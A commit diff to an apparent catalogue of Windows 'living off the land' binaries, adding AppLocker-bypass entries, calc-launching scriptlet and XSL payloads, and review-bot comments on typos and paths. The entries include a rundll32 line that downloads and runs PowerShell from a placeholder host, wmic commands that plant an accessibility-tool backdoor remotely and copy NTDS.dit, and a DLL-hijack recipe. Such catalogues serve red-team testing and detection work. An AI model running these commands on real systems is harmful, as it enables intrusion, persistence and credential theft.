Added some more adjustments

master
api0cradle 2018-04-18 23:45:36 +02:00
parent 1a0eb4edc7
commit 610e5d7607
12 changed files with 216 additions and 21 deletions

View File

@ -11,8 +11,8 @@ Acknowledgements:
Code sample:
* [AllTheThingsX64.dll - Atomic Red Team](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/AllTheThings/AllTheThingsx64.dll)
* [AllTheThingsX32.dll - Atomic Red Team](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/AllTheThings/AllTheThingsx32.dll)
* [AllTheThingsX64.dll](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/AllTheThings/AllTheThingsx64.dll)[1]
* [AllTheThingsX32.dll](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/AllTheThings/AllTheThingsx32.dll)[1]
Resources:
* https://pentestlab.blog/2017/05/08/applocker-bypass-installutil/
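Review bot: the second Code sample link is titled `AllTheThingsX32.dll` and points at `.../AllTheThings/AllTheThingsx32.dll`, while the Regasm.md, Regsvcs.md and Rundll32.md hunks in this same commit link the 32-bit build as `AllTheThingsx86.dll`; the two names cannot both be right unless the upstream Atomic Red Team tree carries both files, so check which one exists and use that file name in all four entries. Also the link titles here use `X64`/`X32` while every other entry uses lower-case `x64`/`x86`; pick one spelling.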
@ -31,7 +31,7 @@ C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
```
Notes:
[1]Code sample linked to Red Canary - Atomic Red Team

View File

@ -10,7 +10,7 @@ Acknowledgements:
* ?
Code sample:
* [NameOfLink](Payload/NameOfPayload)
*
Resources:
* https://cybersyndicates.com/2015/10/a-no-bull-guide-to-malicious-windows-trouble-shooting-packs-and-application-whitelist-bypass/
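Review bot: replacing the `[NameOfLink](Payload/NameOfPayload)` template placeholder with a bare `*` leaves an empty bullet that renders as a stray asterisk, and the `* ?` under Acknowledgements is another leftover placeholder; either fill them in or drop the empty items. The same bare `*` under Code sample appears in the Runscripthelper, SyncAppvPublishingServer and Xwizard hunks of this commit, so whichever convention you choose should be applied to all of them.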

View File

@ -0,0 +1,23 @@
<?XML version="1.0"?>
<scriptlet>
<registration
progid="PoC"
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<!-- regsvr32 /s /u /i:http://example.com/file.sct scrobj.dll -->
<!-- .sct files when downloaded, are executed from a path like this -->
<!-- Please Note, file extenstion does not matter -->
<!-- Though, the name and extension are arbitary.. -->
<!-- c:\users\USER\appdata\local\microsoft\windows\temporary internet files\content.ie5\2vcqsj3k\file[2].sct -->
<!-- Based on current research, no registry keys are written, since call "uninstall" -->
<!-- You can either execute locally, or from a url -->
<script language="JScript">
<![CDATA[
// calc.exe should launch, this could be any arbitrary code.
// What you are hoping to catch is the cmdline, modloads, or network connections, or any variation
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
</registration>
</scriptlet>
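Review bot: the first line, `<?XML version="1.0"?>`, is not a well-formed XML declaration (the declaration target must be lower-case `xml`; upper-case `XML` is a reserved processing-instruction name), whereas the Wmic_calc.xsl file added in this commit correctly uses `<?xml version='1.0'?>`; use the lower-case form here too so any tooling that validates the repo's payload files does not reject it. The comments also carry typos ("extenstion", "arbitary") and the invocation quoted in the comment, `regsvr32 /s /u /i:http://example.com/file.sct scrobj.dll`, omits the `/n` switch that the Regsvr32.md hunk documents for the URL form, so the comment and the entry should agree.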

View File

@ -0,0 +1,11 @@
<?xml version='1.0'?>
<stylesheet
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="placeholder"
version="1.0">
<output method="text"/>
<ms:script implements-prefix="user" language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]> </ms:script>
</stylesheet>
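Review bot: this file is added as `Wmic_calc.xsl`, but the Code sample link added in the Wmic.md hunk reads `[Wmic_calc.xsl](Payloads/Wmic_calc.xls)` (`.xls` extension, and a `Payloads/` directory while Regsvr32.md links its sample under `Payload/`), so that link will not resolve to this file; fix the extension and settle on one directory name. A one-line comment explaining that `xmlns:user="placeholder"` exists only to satisfy `implements-prefix="user"` on the `ms:script` element would save the next reader from wondering whether the namespace URI matters.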

View File

@ -3,14 +3,15 @@
* Functions: Execute
```
regasm.exe /U AllTheThings.dll
regasm.exe /U AllTheThingsx64.dll
```
Acknowledgements:
* Casey Smith - @subtee
Code sample:
* [AllTheThingsx64.dll](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/AllTheThings/AllTheThingsx64.dll)[1]
* [AllTheThingsx64.dll](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/AllTheThings/AllTheThingsx64.dll)[1]
* [AllTheThingsx86.dll](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/AllTheThings/AllTheThingsx86.dll)[1]
Resources:
* https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/
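Review bot: the `[1]` markers on both Code sample links need a matching footnote, but this hunk adds none, whereas the Regsvcs.md and Regsvr32.md hunks append `Notes:` / `[1]Code sample linked to Red Canary - Atomic Red Team`; if Regasm.md does not already carry that line, add it here too. The two identical `AllTheThingsx64.dll` link lines read as a remove-and-readd in this marker-less rendering; confirm the committed file contains the line once, followed by the new `AllTheThingsx86.dll` line.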

View File

@ -3,10 +3,29 @@
* Functions: Execute
```
regsvcs.exe /U regsvcs.dll
regsvcs.exe regsvcs.dll
regsvcs.exe AllTheThingsx64.dll
```
Acknowledgements:
* Casey Smith - @subtee
* Casey Smith - @subtee
Code sample:
* [AllTheThingsx64.dll](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/AllTheThings/AllTheThingsx64.dll)[1]
* [AllTheThingsx86.dll](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/AllTheThings/AllTheThingsx86.dll)[1]
Resources:
* https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/
* https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/RegSvcsRegAsmBypass.cs
* https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/RegsvcsRegasm.md
* https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
Full path:
```
C:\Windows\Microsoft.NET\Framework\v2.0.50727\regsvcs.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regsvcs.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe
```
Notes:
[1]Code sample linked to Red Canary - Atomic Red Team
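Review bot: the hunk drops both `regsvcs.exe /U regsvcs.dll` and `regsvcs.exe regsvcs.dll` in favour of the single `regsvcs.exe AllTheThingsx64.dll`, so the `/U` form that the sibling Regasm.md entry still documents with `regasm.exe /U AllTheThingsx64.dll` no longer appears here; either keep the `/U` form as well or say in Notes why it was removed, so the two entries do not silently diverge. The duplicated `Casey Smith - @subtee` line is presumably a remove-and-readd; confirm it appears once. The added Full path block listing the v2.0.50727 and v4.0.30319 Framework/Framework64 copies is the useful part for defenders, since any other image path for regsvcs.exe is anomalous.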

View File

@ -3,11 +3,33 @@
* Functions: Execute
```
regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
regsvr32.exe /s /u /i:file.sct scrobj.dll
```
Acknowledgements:
* Casey Smith - @subtee
Code sample:
* [Regsvr32_calc.sct](Payload/Regsvr32_calc.sct)[1]
Resources:
* https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Regsvr32.md
* https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
* https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/
Full path:
```
C:\Windows\System32\regsvr32.exe
C:\Windows\SysWOW64\regsvr32.exe
```
Notes:
[1]Code sample linked to Red Canary - Atomic Red Team
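Review bot: the first two command lines are identical (`regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll`), which in this marker-less view looks like a no-op remove/re-add; confirm the file has that line once. The new local-file form `regsvr32.exe /s /u /i:file.sct scrobj.dll` omits `/n` while the URL form keeps it, and the comment inside the added Regsvr32_calc.sct also omits it; either state in Notes whether `/n` is required or make the three lines agree. The Code sample link uses `Payload/` while the Wmic.md hunk uses `Payloads/`; one directory name should be used throughout the repo.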

View File

@ -3,6 +3,8 @@
* Functions: Execute
```
rundll32.exe AllTheThingsx64,EntryPoint
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');"
rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()");
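Review bot: the first added line, `rundll32.exe AllTheThingsx64,EntryPoint`, names the module without its `.dll` extension while the Code sample section below links `AllTheThingsx64.dll`, and the export name `EntryPoint` is not explained anywhere in the entry; write the file name out as `AllTheThingsx64.dll,EntryPoint` and say in Code sample which export of the linked DLL `EntryPoint` refers to, so a reader can match the command line to the linked file. The two `javascript:` lines are very long single lines; consider noting in Notes that they are one command each so they are not mistaken for two entries when the file is reflowed.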
@ -37,6 +39,27 @@ Acknowledgements:
* Jimmy - @bohops
* Moriarty - @Moriarty_Meng
* Adam - @hexacorn
Code sample:
* [AllTheThingsx64.dll](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/AllTheThings/AllTheThingsx64.dll)[1]
* [AllTheThingsx86.dll](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/AllTheThings/AllTheThingsx86.dll)[1]
Resources:
* https://pentestlab.blog/2017/05/23/applocker-bypass-rundll32/
* https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_7
* https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Rundll32.md
* https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
Full path:
```
C:\Windows\System32\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe
```
Notes:
[1]Code sample linked to Red Canary - Atomic Red Team

View File

@ -9,4 +9,22 @@ runscripthelper.exe surfacecheck \\?\C:\Test\Microsoft\Diagnosis\scripts\test.tx
Acknowledgements:
* Matt Graeber - @mattifestation
Code sample:
*
Resources:
* https://posts.specterops.io/bypassing-application-whitelisting-with-runscripthelper-exe-1906923658fc
Full path:
```
C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.15_none_c2df1bba78111118\Runscripthelper.exe
C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.192_none_ad4699b571e00c4a\Runscripthelper.exe
```
Notes:
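Review bot: `Notes:` is added with no content and Code sample has a bare `*`; either fill them in or leave the headings out. The two Full path entries are version-specific WinSxS directories (10.0.16299.15 and 10.0.16299.192, with the `u..ed-telemetry-client` name truncated the way WinSxS does it), so a Notes line saying that the path changes with every telemetry-client update would help anyone turning this entry into a path-based detection rule rather than matching on the two builds listed.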

View File

@ -8,3 +8,21 @@ SyncAppvPublishingServer.exe "n;((New-Object Net.WebClient).DownloadString('http
Acknowledgements:
* Nick Landers - @monoxgas
Code sample:
*
Resources:
* https://twitter.com/monoxgas/status/895045566090010624
Full path:
```
C:\Windows\System32\SyncAppvPublishingServer.exe
```
Notes:
Command injection into PowerShell
Might have been fixed in newest version of Windows 10.
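Review bot: "Might have been fixed in newest version of Windows 10" is too vague to act on; name the Windows 10 release or build on which the injection was last confirmed and the one on which it no longer reproduced (or link the source for the claim), so the entry can be re-tested and defenders know whether the listed Full path still warrants a rule. Minor grammar: "in the newest version".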

View File

@ -1,16 +1,56 @@
## WMIC.exe
* Functions: Execute
* Functions: Reconnaissance, Execute, Read ADS
```
wmic process call create calc
wmic process call create calc
wmic process get brief /format:"https://www.example.com/file.xsl
wmic os get /format:"MYXSLFILE.xsl"
wmic process get brief /format:"\\127.0.0.1\c$\Tools\pocremote.xsl"
wmic process call create '"c:\ads\file.txt:program.exe"'
wmic useraccount get /ALL
wmic process get caption,executablepath,commandline
wmic qfe get description,installedOn /format:csv
wmic /node:"192.168.0.1" service where (caption like "%sql server (%")
get-wmiobject class "win32_share" namespace "root\CIMV2" computer "targetname"
wmic /user:<username> /password:<password> /node:<computer_name> process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f"
wmic /NODE: "192.168.0.1" process call create "evil.exe"
wmic /node:REMOTECOMPUTERNAME PROCESS call create "at 9:00PM c:\GoogleUpdate.exe ^> c:\notGoogleUpdateResults.txt"
wmic /node:REMOTECOMPUTERNAME PROCESS call create "cmd /c vssadmin create shadow /for=C:\Windows\NTDS\NTDS.dit > c:\not_the_NTDS.dit"
wmic process get brief /format:"https://www.example.com/file.xsl"
wmic os get /format:"MYXSLFILE.xsl"
wmic process get brief /format:"\\127.0.0.1\c$\Tools\pocremote.xsl"
```
Acknowledgements:
* Casey Smith - @subtee
Code sample:
* [Wmic_calc.xsl](Payloads/Wmic_calc.xls)
Resources:
* https://stackoverflow.com/questions/24658745/wmic-how-to-use-process-call-create-with-a-specific-working-directory
* https://subt0x11.blogspot.no/2018/04/wmicexe-whitelisting-bypass-hacking.html
* https://twitter.com/subTee/status/986234811944648707
Full path:
```
c:\windows\system32\wbem\wmic.exe
c:\windows\sysWOW64\wbem\wmic.exe
```
Notes:
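Review bot: the Code sample link `[Wmic_calc.xsl](Payloads/Wmic_calc.xls)` has the wrong extension (the file added in this commit is `Wmic_calc.xsl`) and a `Payloads/` directory that differs from Regsvr32.md's `Payload/`, so the link will not resolve. The line `get-wmiobject class "win32_share" namespace "root\CIMV2" computer "targetname"` is a PowerShell cmdlet, written without its `-` parameter prefixes, rather than a wmic.exe invocation, so it does not belong in a WMIC.exe entry; drop it or move it to a PowerShell entry. Also, `/NODE: "192.168.0.1"` has a space after the colon that the `/node:"192.168.0.1"` line above does not, and the earlier `/format:"https://www.example.com/file.xsl` line is missing its closing quote (the repeated copy near the end of the block has it); confirm that only the corrected copies of the `/format:` lines and the `wmic process call create calc` line survive in the file. `Notes:` is added empty; since the entry now lists remote (`/node:`) execution, a short note on which event sources record these invocations would be the most useful thing to put there.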

View File

@ -3,8 +3,28 @@
* Functions: DLL hijack
```
xwizard.exe (xwizard.dll in same folder)
xwizard.exe
```
Acknowledgements:
* Adam - @Hexacorn
* Adam - @Hexacorn
Code sample:
*
Resources:
* http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/
Full path:
```
c:\windows\system32\xwizard.exe
c:\windows\sysWOW32\xwizard.exe
```
Notes:
Need to copy out xwizard.exe to a user controlled folder.
If you add your own version of xwizard.dll it will execute when you start xwizard.exe.
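Review bot: the second Full path entry `c:\windows\sysWOW32\xwizard.exe` should be `SysWOW64`, as in the Regsvr32, Rundll32 and Wmic hunks of this commit; there is no SysWOW32 directory. The Notes already make the point that matters for defenders, that the hijack only works after xwizard.exe is copied out to a user-controlled folder, so it is worth stating explicitly that xwizard.exe executing from any path other than the two listed is the thing to alert on. The duplicated `Adam - @Hexacorn` acknowledgement line looks like a remove-and-readd; confirm it appears once.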